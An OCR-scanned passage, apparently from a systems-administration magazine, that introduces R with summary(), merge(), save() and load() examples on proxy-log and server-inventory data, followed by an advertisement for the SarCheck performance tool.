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Delay 


Min, 

1.00 

1st Qu. 

2.00 

Median 

3.00 

Mean 

11.38 

3rd Qu, 

6.00 

Max. 

217.00 
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> summary(CALAMARIS) 


domain number,of.requests percent.of.total.requests Total.Bytes 


*.Cfl 

1 

Min. 

3.0 

Min. 

0,09 

Min. : 

7919 

*.com 

1 

1st Qu. 

32.0 

1st Qu. 

0.94 

1st Qu.: 

114303 

*.de 

1 

Median 

127.0 

Median 

3.75 

Median : 

450469 

*.edu 

1 

Mean 

376.8 

Mean 

11.11 

Mean 

:1656217 

*.gr 

1 

3rd Qu. 

187.0 

3rd Qu. 

5.51 

3rd Qu. 

:1249501 

*.net 

1 

Max. 

1403.0 

Max. 

41.37 

Max. 

;7649799 


(Other);3 

> 

There is also a very handy way for representing a data set graphi¬ 
cally. Figure 1 shows the output of the pa 1 rs() command. Again, 
the CALAMAR1S data set is used. What you see in Figure I is the 
graphical representation of all the subsets of the CALAMARIS data 
set in pairs. 

R supports the following types of objects: 

• Vectors (the most important objects in R) 

• Matrices (arrays) 

• Factors 

• Lists 

• Data frames 

• Functions 

For more information about those objects, refer to the documenta¬ 
tion that comes with your R installation. 


The merge () command can be very useful because it works sim¬ 
ilarly to database joins, which means that related tables of data can 
be combined into one table. The following is a complete example of 


merged: 

> SERVER 

Name 

OS 

Version 

1 Pluto 

Solaris 

8 

2 Plato 

Linux_Debian 

Stable 

3 Racoon 

AIX 

5L 

4 Pi k 

Linux_Debian 

Unstable 

5 Eugenia 

Solaris_x86 

9 

> ADMIN 

Machine 

Admin_Name 

Admi n_Surnaire 

1 Pluto 

Tom 

Philips 

2 Eugenia 

Anna 

Tomas 

3 Plato 

Jim 

Papadopoulos 

4 Racoon 

Peter 

McRay 

5 Pi k 

John 

Papas 


> merge(SERVER, ADMIN, by.x="Name”, by.y="Machine") 

Name OS Version Admin.Name Admin_Surname 


1 

Eugenia 

Solaris_x86 

9 

Anna 

Tomas 

2 

Pi k 

Linux_Debian 

Unstable 

John 

Paoas 

3 

Plato 

Linux_Debian 

Stable 

Jim 

Papadopoulos 

4 

Pluto 

Solaris 

8 

Tom 

Philips 

5 

Racoon 

AIX 

5L 

Peter 

McRay 


> 


Advanced Commands of 
the R System 

The save( ) command is used for dump¬ 
ing an object to disk in order to use it later: 

) save(SYSADMIN, file - \ 

"/Users/ratsouk/SYSAMIN.r") 

To read data from a file, use the load() 
command: 

> rm(SYSADMIN) 

> SYSADMIN 

Error: Object "SYSADMIN" not found 

> 1oad( file = "/Users/mtsouk/SYSAMIN.r" ) 

> SYSADMIN 

0 12 3 4 5 6 7 
1 3 9 27 81 243 729 2187 

> 

With the edit() command, the editor pre¬ 
sents the data set ready for editing. I think 
this is very practical. The R package can 
also import data from various formats and 
database systems including PostgreSQL 
and database sources supporting the ODBC 
interface. R can also communicate via BSD 
sockets. For more information, refer to: 

http://developer.r-project.org/db 
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UNIX and Linux 
Performance Tuning 
Simplified! 


Understand 
Exactly What’s 
Happening 

SarCheek translates 
pages of sar and ps 
output into a plain 
English or HTML 
report, complete with 
recommendations. 


Maintain 
Full Control 

SarCheek fully 
explains each of its 
recommendations, 
providing the 
i n format ion needed 
to take intelligent 
informed actions. 


Plan for 
Future Growth 

SarCheck’s Capacity 
Planning feature helps 
you to plan for growth, 
before slow' downs or 
problems occur. 
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